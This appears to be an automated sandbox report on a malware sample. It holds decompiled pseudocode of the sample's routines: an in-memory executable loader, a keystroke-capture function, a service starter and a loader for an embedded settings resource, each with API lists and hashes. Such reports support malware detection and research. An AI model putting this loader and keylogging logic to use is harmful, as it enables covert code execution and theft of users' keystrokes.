										 *((intOrPtr*)(_t117 + 0x28)) = E0041121B;
										 *((intOrPtr*)(_t117 + 0x2c)) = E0041122A;
										 *((intOrPtr*)(_t117 + 0x34)) = 0;
										 *((intOrPtr*)(_t117 + 0x3c)) =  *((intOrPtr*)(_t128 + 0x1c));
										_t66 = E00410CDF( *((intOrPtr*)(_t128 + 0x14)),  *((intOrPtr*)(_t90 + 0x54)));
										__eflags = _t66;
										if(_t66 == 0) {
											L34:
											E004115BA(_t117);
											L35:
											_t68 = 0;
											__eflags = 0;
											L36:
											return _t68;
										}
										_push(0);
										_t121 = E004111E6(_t126,  *((intOrPtr*)(_t90 + 0x54)), 0x1000, 4);
										E004351E0(_t121,  *((intOrPtr*)(_t128 + 0x28)),  *((intOrPtr*)(_t90 + 0x54)));
										_t73 =  *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x30)) + 0x3c)) + _t121;
										 *_t117 = _t73;
										 *(_t73 + 0x34) = _t126;
										_t74 = E00410CF2( *((intOrPtr*)(_t128 + 0x34)), _t90, _t117);
										__eflags = _t74;
										if(_t74 == 0) {
											goto L34;
										}
										_t75 =  *_t117;
										_t114 =  *((intOrPtr*)(_t75 + 0x34)) ==  *((intOrPtr*)(_t90 + 0x34));
										__eflags =  *((intOrPtr*)(_t75 + 0x34)) ==  *((intOrPtr*)(_t90 + 0x34));
										if( *((intOrPtr*)(_t75 + 0x34)) ==  *((intOrPtr*)(_t90 + 0x34))) {
											_t123 = 1;
											__eflags = 1;
											 *((intOrPtr*)(_t117 + 0x18)) = 1;
										} else {
											 *((intOrPtr*)(_t117 + 0x18)) = E00410FF6(_t114);
											_t123 = 1;
										}
										__eflags = E004110A2(_t117);
										if(__eflags != 0) {
											_t77 = E00410E92(_t117, __eflags);
											__eflags = _t77;
											if(_t77 == 0) {
												goto L34;
											}
											_t78 = E00410FC5(_t117);
											__eflags = _t78;
											if(_t78 == 0) {
												goto L34;
											}
											_t80 =  *( *_t117 + 0x28);
											__eflags = _t80;
											if(_t80 == 0) {
												_t48 = _t117 + 0x38;
												 *_t48 =  *(_t117 + 0x38) & 0x00000000;
												__eflags =  *_t48;
												L41:
												_t68 = _t117;
												goto L36;
											}
											_t81 = _t80 + _t126;
											__eflags =  *(_t117 + 0x14);
											if( *(_t117 + 0x14) == 0) {
												 *(_t117 + 0x38) = _t81;
												goto L41;
											}
											_t82 =  *_t81(_t126, _t123, 0);
											__eflags = _t82;
											if(_t82 != 0) {
												 *((intOrPtr*)(_t117 + 0x10)) = _t123;
												goto L41;
											}
											SetLastError(0x45a);
										}
										goto L34;
									}
									_push(0);
									E004111FD(_t126, 0, 0x8000);
									L19:
									SetLastError(0xe);
									L16:
									goto L35;
								}
								_push(0);
								_t126 = E004111E6(0, _t116, 0x3000, 0x40);
								_t128 = _t128 + 0x14;
								__eflags = _t126;
								if(_t126 != 0) {
									goto L20;
								}
								goto L19;
							}
							SetLastError(0xc1);
							goto L16;
						}
						_t104 = _t90 + 0x24 + _t55;
						__eflags = _t104;
						do {
							__eflags =  *(_t104 + 4);
							_t86 =  *_t104;
							if( *(_t104 + 4) != 0) {
								_t87 = _t86 +  *(_t104 + 4);
								__eflags = _t87;
							} else {
								_t87 = _t86 +  *(_t90 + 0x38);
							}
							__eflags = _t87 - _t119;
							_t119 =  >  ? _t87 : _t119;
							_t104 = _t104 + 0x28;
							_t109 = _t109 - 1;
							__eflags = _t109;
						} while (_t109 != 0);
						goto L14;
					}
					L3:
					SetLastError(0xc1);
				}
				L1:
				return 0;
			}































                0x0041124d
                0x00411250
                0x00411254
                0x00411258
                0x00411261
                0x0041126f
                0x00411273
                0x0041128d
                0x00411292
                0x00411294
                0x00000000
                0x00000000
                0x00411299
                0x0041129b
                0x004112a1
                0x00000000
                0x00000000
                0x004112a8
                0x004112ac
                0x00000000
                0x00000000
                0x004112ae
                0x004112b2
                0x00000000
                0x00000000
                0x004112b4
                0x004112b8
                0x004112bc
                0x004112be
                0x004112e2
                0x004112e8
                0x004112fc
                0x004112fe
                0x00411303
                0x00411305
                0x00411319
                0x0041132a
                0x0041132c
                0x0041132f
                0x00411331
                0x0041134f
                0x00411360
                0x00411362
                0x00411364
                0x0041137c
                0x00411389
                0x00411390
                0x00411393
                0x0041139a
                0x004113a1
                0x004113a8
                0x004113af
                0x004113b6
                0x004113bc
                0x004113c1
                0x004113c3
                0x00411473
                0x00411475
                0x0041147a
                0x0041147a
                0x0041147a
                0x0041147c
                0x00000000
                0x0041147c
                0x004113c9
                0x004113dd
                0x004113e4
                0x004113f9
                0x004113fb
                0x004113fe
                0x00411401
                0x00411409
                0x0041140b
                0x00000000
                0x00000000
                0x0041140d
                0x00411412
                0x00411412
                0x00411415
                0x00411428
                0x00411428
                0x00411429
                0x00411417
                0x00411420
                0x00411423
                0x00411423
                0x00411433
                0x00411435
                0x00411439
                0x0041143e
                0x00411440
                0x00000000
                0x00000000
                0x00411444
                0x00411449
                0x0041144b
                0x00000000
                0x00000000
                0x0041144f
                0x00411452
                0x00411454
                0x0041148e
                0x0041148e
                0x0041148e
                0x00411492
                0x00411492
                0x00000000
                0x00411492
                0x00411456
                0x00411458
                0x0041145c
                0x00411489
                0x00000000
                0x00411489
                0x00411462
                0x00411464
                0x00411466
                0x00411484
                0x00000000
                0x00411484
                0x0041146d
                0x0041146d
                0x00000000
                0x00411435
                0x00411366
                0x0041136e
                0x0041134b
                0x0041130c
                0x0041130c
                0x00000000
                0x0041130c
                0x00411333
                0x00411342
                0x00411344
                0x00411347
                0x00411349
                0x00000000
                0x00000000
                0x00000000
                0x00411349
                0x0041130c
                0x00000000
                0x0041130c
                0x004112c3
                0x004112c3
                0x004112c5
                0x004112c5
                0x004112c9
                0x004112cb
                0x004112d2
                0x004112d2
                0x004112cd
                0x004112cd
                0x004112cd
                0x004112d5
                0x004112d7
                0x004112da
                0x004112dd
                0x004112dd
                0x004112dd
                0x00000000
                0x004112c5
                0x00411275
                0x0041127a
                0x0041127a
                0x00411263
                0x00000000

                APIs
                  • Part of subcall function 00410CDF: SetLastError.KERNEL32(0000000D,0041125F,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041123D), ref: 00410CE5
                • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041123D), ref: 0041127A
                • GetNativeSystemInfo.KERNEL32(?,0040C7AB,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041123D), ref: 004112E8
                • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 0041130C
                  • Part of subcall function 004111E6: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,0041132A,?,00000000,00003000,00000040,00000000,?,?), ref: 004111F6
                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411353
                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0041135A
                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041146D
                  • Part of subcall function 004115BA: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041147A,?,?,?,?,?), ref: 0041162A
                  • Part of subcall function 004115BA: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00411631
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                • String ID:
                • API String ID: 3950776272-0
                • Opcode ID: bd525cc1913b0ea8265babaacec09d0fcbdf2b7538008eea0c1f98325fc720c9
                • Instruction ID: 0cb4cb50e04e4c00dda63c2048a6518c68fbc69f33767e983cf50f1e9feca01c
                • Opcode Fuzzy Hash: bd525cc1913b0ea8265babaacec09d0fcbdf2b7538008eea0c1f98325fc720c9
                • Instruction Fuzzy Hash: 7F61D470605201ABD7109F66CD81BAB7BA5BF44740F04416AFE05977A2EBBCD8C1CBD9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004099E3 Relevance: 9.1, APIs: 6, Instructions: 54keyboardthreadCOMMON
                Download Yara Rule
                C-Code - Quality: 89%
                			E004099E3(void* __ecx, intOrPtr _a4) {
				long _v8;
				void _v38;
				short _v40;
				char _v296;
				void* __ebx;
				void* __edi;
				void* __ebp;
				struct HKL__* _t20;
				void* _t30;
				signed int _t32;
				void* _t36;
				void* _t37;
				void* _t41;

				_t30 = __ecx;
				E00435760(_t37,  &_v296, 0, 0x100);
				_v40 = 0;
				_t32 = 7;
				memset( &_v38, 0, _t32 << 2);
				asm("stosw");
				_t20 = GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(),  &_v8));
				GetKeyState(0x10);
				GetKeyboardState( &_v296);
				ToUnicodeEx( *(_t30 + 0x4c),  *(_t30 + 0x50),  &_v296,  &_v40, 0x10, 0, _t20);
				E0040415E(_t30, _a4, _t36, _t41,  &_v40);
				return _a4;
			}
















                0x004099fa
                0x004099ff
                0x00409a0c
                0x00409a12
                0x00409a13
                0x00409a15
                0x00409a29
                0x00409a33
                0x00409a40
                0x00409a5c
                0x00409a69
                0x00409a77

                APIs
                • GetForegroundWindow.USER32(00000000,?,00000000), ref: 00409A17
                • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409A22
                • GetKeyboardLayout.USER32 ref: 00409A29
                • GetKeyState.USER32(00000010), ref: 00409A33
                • GetKeyboardState.USER32(?), ref: 00409A40
                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409A5C
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                • String ID:
                • API String ID: 3566172867-0
                • Opcode ID: 677c15e1911c7d5858dbd143638b3e9bc5ab1a814779878d35ced18a05c88380
                • Instruction ID: aeedf37edc6dd1a703413de17d62dd48ee8b6b0f748b25ac56bea9041ac92ee6
                • Opcode Fuzzy Hash: 677c15e1911c7d5858dbd143638b3e9bc5ab1a814779878d35ced18a05c88380
                • Instruction Fuzzy Hash: 35110C7290020CABDB109BA4ED49FDA77ACEB0C316F1004B5FE05E6191E675AA54DBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004195A5 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004195A5(char _a4) {
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t18 = OpenSCManagerW(0, 0, 0x10);
				_t17 = OpenServiceW(_t18, E00401EE4( &_a4), 0x10);
				if(_t17 != 0) {
					_t14 = 0 | StartServiceW(_t17, 0, 0) != 0x00000000;
					CloseServiceHandle(_t18);
					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				E00401EE9();
				return _t14;
			}






                0x004195aa
                0x004195ba
                0x004195c9
                0x004195cd
                0x004195ea
                0x004195ed
                0x004195f0
                0x004195cf
                0x004195d0
                0x004195d0
                0x004195f6
                0x00419600

                APIs
                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,004191FB,00000000), ref: 004195AE
                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,004191FB,00000000), ref: 004195C3
                • CloseServiceHandle.ADVAPI32(00000000,?,004191FB,00000000), ref: 004195D0
                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,004191FB,00000000), ref: 004195DB
                • CloseServiceHandle.ADVAPI32(00000000,?,004191FB,00000000), ref: 004195ED
                • CloseServiceHandle.ADVAPI32(00000000,?,004191FB,00000000), ref: 004195F0
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Service$CloseHandle$Open$ManagerStart
                • String ID:
                • API String ID: 276877138-0
                • Opcode ID: 46d7a5748c115b06c05da62377f7d8103201d003051ebdc645d0e909444f461a
                • Instruction ID: 9846d5d3bfd465166b522490e3d014472adb2eb81bdb42509a6f537d7eac31bb
                • Opcode Fuzzy Hash: 46d7a5748c115b06c05da62377f7d8103201d003051ebdc645d0e909444f461a
                • Instruction Fuzzy Hash: 43F0E9721052247FD2119F20BCC8DFF27ECDF81BA6B00043AF501921D18F68CD45A5B5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00450558 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 68%
                			E00450558(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed short* _a8, char _a12) {
				intOrPtr* _v8;
				short _v12;
				signed int _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* __ebp;
				void* _t34;
				short* _t35;
				intOrPtr* _t36;
				signed int _t39;
				signed short* _t44;
				intOrPtr _t47;
				void* _t49;
				signed int _t52;
				signed int _t58;
				signed int _t60;
				signed int _t66;
				void* _t68;
				void* _t71;
				void* _t76;
				void* _t80;
				intOrPtr _t87;
				short* _t89;
				void* _t90;
				void* _t92;
				short _t94;
				void* _t95;
				intOrPtr* _t98;
				void* _t112;
				void* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				signed int* _t122;
				intOrPtr* _t125;
				signed short _t127;
				int _t129;
				signed int _t132;
				void* _t133;
				signed int _t134;

				_t115 = __edx;
				_push(__ecx);
				_push(__ecx);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t34 = E00446A95(__ebx, __ecx, __edx);
				_t87 = _a4;
				_t94 = 0;
				_v12 = 0;
				_t3 = _t34 + 0x50; // 0x50
				_t125 = _t3;
				_t4 = _t125 + 0x250; // 0x2a0
				_t35 = _t4;
				 *((intOrPtr*)(_t125 + 8)) = 0;
				 *_t35 = 0;
				_t6 = _t125 + 4; // 0x54
				_t118 = _t6;
				_v8 = _t35;
				_t36 = _t87 + 0x80;
				 *_t125 = _t87;
				 *_t118 = _t36;
				if( *_t36 != 0) {
					E004504E9(0x45e200, 0x16, _t118);
					_t133 = _t133 + 0xc;
					_t94 = 0;
				}
				_push(_t125);
				if( *((intOrPtr*)( *_t125)) == _t94) {
					E0044FE5A(_t87, _t94, _t115, _t118, __eflags);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t118)) == _t94) {
						E0044FF7D();
					} else {
						E0044FEE3(_t94);
					}
					_pop(_t95);
					if( *((intOrPtr*)(_t125 + 8)) == 0) {
						_t80 = E004504E9(0x45def0, 0x40, _t125);
						_t133 = _t133 + 0xc;
						if(_t80 != 0) {
							_push(_t125);
							if( *((intOrPtr*)( *_t118)) == 0) {
								E0044FF7D();
							} else {
								E0044FEE3(0);
							}
							L12:
							_pop(_t95);
						}
					}
				}
				if( *((intOrPtr*)(_t125 + 8)) == 0) {
					L31:
					_t39 = 0;
					__eflags = 0;
					goto L32;
				} else {
					_t127 = E004503B7(_t95, _t87 + 0x100, _t125);
					if(_t127 == 0 || _t127 == 0xfde8 || _t127 == 0xfde9 || IsValidCodePage(_t127 & 0x0000ffff) == 0) {
						goto L31;
					} else {
						_t44 = _a8;
						if(_t44 != 0) {
							 *_t44 = _t127;
						}
						_t13 =  &_a12; // 0x443374
						_t121 =  *_t13;
						if(_t121 == 0) {
							L30:
							_t39 = 1;
							goto L32;
						} else {
							_t98 = _v8;
							_t89 = _t121 + 0x120;
							 *_t89 = 0;
							_t116 = _t98 + 2;
							do {
								_t47 =  *_t98;
								_t98 = _t98 + 2;
							} while (_t47 != _v12);
							_t100 = _t98 - _t116 >> 1;
							_push((_t98 - _t116 >> 1) + 1);
							_t49 = E0044E949(_t98 - _t116 >> 1, _t89, 0x55, _v8);
							_t134 = _t133 + 0x10;
							_t153 = _t49;
							if(_t49 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E0043A5E8();
								asm("int3");
								_t132 = _t134;
								_t52 =  *0x46f00c; // 0xd60a1515
								_v52 = _t52 ^ _t132;
								_push(_t89);
								_push(_t127);
								_push(_t121);
								_t90 = E00446A95(_t89, _t100, _t116);
								_t122 =  *(E00446A95(_t90, _t100, _t116) + 0x34c);
								_t129 = E00450C6B(_v40);
								asm("sbb ecx, ecx");
								_t58 = GetLocaleInfoW(_t129, ( ~( *(_t90 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								__eflags = _t58;
								if(_t58 != 0) {
									_t60 = E00452294(_t90, _t122, _t129,  *((intOrPtr*)(_t90 + 0x54)),  &_v272);
									__eflags = _t60;
									if(_t60 == 0) {
										_t66 = E00450D9F(_t129);
										__eflags = _t66;
										if(_t66 != 0) {
											 *_t122 =  *_t122 | 0x00000004;
											__eflags =  *_t122;
											_t122[2] = _t129;
											_t122[1] = _t129;
										}
									}
									__eflags =  !( *_t122 >> 2) & 0x00000001;
								} else {
									 *_t122 =  *_t122 & _t58;
								}
								__eflags = _v32 ^ _t132;
								return E004338BB(_v32 ^ _t132);
							} else {
								_t68 = E0044716D(_t100, _t127, _t153, _t89, 0x1001, _t121, 0x40);
								_t154 = _t68;
								if(_t68 == 0) {
									goto L31;
								} else {
									_t92 = _t121 + 0x80;
									if(E0044716D(_t100, _t127, _t154, _t121 + 0x120, 0x1002, _t92, 0x40) == 0) {
										goto L31;
									} else {
										_push(0x5f);
										_t71 = E00456277(_t100);
										_t112 = _t92;
										if(_t71 != 0) {
											L28:
											if(E0044716D(_t112, _t127, _t157, _t121 + 0x120, 7, _t92, 0x40) == 0) {
												goto L31;
											} else {
												goto L29;
											}
										} else {
											_push(0x2e);
											_t76 = E00456277(_t112);
											_t112 = _t92;
											_t157 = _t76;
											if(_t76 == 0) {
												L29:
												E004407BF(_t112, _t127, _t121 + 0x100, 0x10, 0xa);
												goto L30;
											} else {
												goto L28;
											}
										}
									}
								}
								L32:
								return _t39;
							}
						}
					}
				}
			}












































                0x00450558
                0x0045055d
                0x0045055e
                0x0045055f
                0x00450560
                0x00450561
                0x00450562
                0x00450567
                0x0045056a
                0x0045056c
                0x0045056f
                0x0045056f
                0x00450572
                0x00450572
                0x00450578
                0x0045057b
                0x0045057e
                0x0045057e
                0x00450581
                0x00450584
                0x0045058a
                0x0045058c
                0x00450591
                0x0045059b
                0x004505a0
                0x004505a3
                0x004505a3
                0x004505a7
                0x004505ab
                0x004505f4
                0x00000000
                0x004505ad
                0x004505b2
                0x004505bb
                0x004505b4
                0x004505b4
                0x004505b4
                0x004505c2
                0x004505c6
                0x004505d0
                0x004505d5
                0x004505da
                0x004505e0
                0x004505e4
                0x004505ed
                0x004505e6
                0x004505e6
                0x004505e6
                0x004505f9
                0x004505f9
                0x004505f9
                0x004505da
                0x004505c6
                0x004505ff
                0x00450711
                0x00450711
                0x00450711
                0x00000000
                0x00450605
                0x00450612
                0x00450618
                0x00000000
                0x00450648
                0x00450648
                0x0045064d
                0x0045064f
                0x0045064f
                0x00450651
                0x00450651
                0x00450656
                0x0045070c
                0x0045070e
                0x00000000
                0x0045065c
                0x0045065c
                0x0045065f
                0x00450667
                0x0045066a
                0x0045066d
                0x0045066d
                0x00450670
                0x00450673
                0x0045067b
                0x00450680
                0x00450687
                0x0045068c
                0x0045068f
                0x00450691
                0x0045071c
                0x0045071d
                0x0045071e
                0x0045071f
                0x00450720
                0x00450721
                0x00450726
                0x0045072a
                0x00450732
                0x00450739
                0x0045073c
                0x0045073d
                0x00450741
                0x00450747
                0x0045074f
                0x0045075e
                0x0045076a
                0x0045077b
                0x00450781
                0x00450783
                0x00450794
                0x0045079b
                0x0045079d
                0x004507a0
                0x004507a6
                0x004507a8
                0x004507aa
                0x004507aa
                0x004507ad
                0x004507b0
                0x004507b0
                0x004507a8
                0x004507ba
                0x00450785
                0x00450785
                0x00450787
                0x004507c2
                0x004507cd
                0x00450697
                0x004506a0
                0x004506a5
                0x004506a7
                0x00000000
                0x004506a9
                0x004506ab
                0x004506c5
                0x00000000
                0x004506c7
                0x004506c7
                0x004506ca
                0x004506d0
                0x004506d3
                0x004506e3
                0x004506f6
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004506d5
                0x004506d5
                0x004506d8
                0x004506de
                0x004506df
                0x004506e1
                0x004506f8
                0x00450704
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004506e1
                0x004506d3
                0x004506c5
                0x00450713
                0x00450719
                0x00450719
                0x00450691
                0x00450656
                0x00450618

                APIs
                  • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                  • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                  • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                  • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443374,?,?,?,?,00442DCB,?,00000004), ref: 0045063A
                • _wcschr.LIBVCRUNTIME ref: 004506CA
                • _wcschr.LIBVCRUNTIME ref: 004506D8
                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,t3D,00000000,?), ref: 0045077B
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                • String ID: t3D
                • API String ID: 4212172061-694417703
                • Opcode ID: b9c9552eaca3d1881d3ae1f5d8ad23bd1f562e179b5fb4d1a587ec592402c2be
                • Instruction ID: ba7a9897b5b485b0d00a1d7db932209b8575a85ef4c726eb57bec7d4989f050b
                • Opcode Fuzzy Hash: b9c9552eaca3d1881d3ae1f5d8ad23bd1f562e179b5fb4d1a587ec592402c2be
                • Instruction Fuzzy Hash: 59610B75500706AAE724AB75CC42A6B73A8EF09705F14046FFD05DB282FB78ED488B69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00450CBC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 94%
                			E00450CBC(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t12 = _a8 + 8; // 0xfde8fe81
					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x45e318;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x45e320;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E0043A382(_t23, _t23);
									goto L25;
								}
								_t8 = _a8 + 8; // 0xfde8fe81
								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}
















                0x00450cc1
                0x00450cc2
                0x00450cc9
                0x00450d6d
                0x00450d7b
                0x00450d86
                0x00450d8c
                0x00450d91
                0x00450d93
                0x00450d93
                0x00450d99
                0x00450d9e
                0x00450d9e
                0x00450d88
                0x00450d88
                0x00000000
                0x00450d88
                0x00450ccf
                0x00450cd4
                0x00000000
                0x00000000
                0x00450cda
                0x00450cdf
                0x00450ce1
                0x00450ce1
                0x00450ce7
                0x00000000
                0x00000000
                0x00450cec
                0x00450d03
                0x00450d03
                0x00450d0c
                0x00450d0e
                0x00000000
                0x00000000
                0x00450d10
                0x00450d15
                0x00450d17
                0x00450d17
                0x00450d1d
                0x00000000
                0x00000000
                0x00450d22
                0x00450d40
                0x00450d42
                0x00450d65
                0x00000000
                0x00450d6a
                0x00450d52
                0x00450d5d
                0x00000000
                0x00000000
                0x00450d5f
                0x00000000
                0x00450d5f
                0x00450d24
                0x00450d2c
                0x00000000
                0x00000000
                0x00450d2e
                0x00450d31
                0x00450d37
                0x00000000
                0x00000000
                0x00000000
                0x00450d39
                0x00450d3b
                0x00450d3d
                0x00000000
                0x00450d3d
                0x00450cee
                0x00450cf6
                0x00000000
                0x00000000
                0x00450cf8
                0x00450cfb
                0x00450d01
                0x00000000
                0x00000000
                0x00000000
                0x00450d01
                0x00450d07
                0x00450d09
                0x00000000

                APIs
                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00450FDB,?,00000000), ref: 00450D55
                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00450FDB,?,00000000), ref: 00450D7E
                • GetACP.KERNEL32(?,?,00450FDB,?,00000000), ref: 00450D93
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: InfoLocale
                • String ID: ACP$OCP
                • API String ID: 2299586839-711371036
                • Opcode ID: e1cc0e8b5d55e55e0692ae403176d07c371e2c9d392849c0dfe23d3819b2362a
                • Instruction ID: f4dc62717276faaaa6782721abfec9566da5d0668c2a958c42eb904ffeb84586
                • Opcode Fuzzy Hash: e1cc0e8b5d55e55e0692ae403176d07c371e2c9d392849c0dfe23d3819b2362a
                • Instruction Fuzzy Hash: 2C21A73AA00205AAD7348F94D900A9B73B6EF54B52B568466ED0DDB203E736ED4DC398
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041A003 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0041A003(void** __ecx) {
				struct HRSRC__* _t1;
				void* _t3;
				long _t4;
				void** _t5;
				struct HRSRC__* _t7;

				_t5 = __ecx;
				_t1 = FindResourceA( *0x470d40, "SETTINGS", 0xa);
				_t7 = _t1;
				if(_t7 != 0) {
					_t3 = LockResource(LoadResource( *0x470d40, _t7));
					_t4 = SizeofResource( *0x470d40, _t7);
					 *_t5 = _t3;
					return _t4;
				}
				return _t1;
			}








                0x0041a012
                0x0041a014
                0x0041a01a
                0x0041a01e
                0x0041a02f
                0x0041a03e
                0x0041a044
                0x00000000
                0x0041a046
                0x0041a049

                APIs
                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A014
                • LoadResource.KERNEL32(00000000,?,?,0040E8FB,00000000), ref: 0041A028
                • LockResource.KERNEL32(00000000,?,?,0040E8FB,00000000), ref: 0041A02F
                • SizeofResource.KERNEL32(00000000,?,?,0040E8FB,00000000), ref: 0041A03E
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Resource$FindLoadLockSizeof
                • String ID: SETTINGS
                • API String ID: 3473537107-594951305
                • Opcode ID: 2d1e4ba86f2e32d2beda4657f94b09353a7239f4cfd5f7509494277a44e50716
                • Instruction ID: b95858df6d0456d97b6bbc8465da1c17ee9993c19fec26ac2e34289928cab2cf
                • Opcode Fuzzy Hash: 2d1e4ba86f2e32d2beda4657f94b09353a7239f4cfd5f7509494277a44e50716
                • Instruction Fuzzy Hash: 26E01A76205B10ABC7311FA1BC4CD073F29F789753B100035F909D6321DA358850CA59
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00408D1B Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                Download Yara Rule
                C-Code - Quality: 93%
                			E00408D1B(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
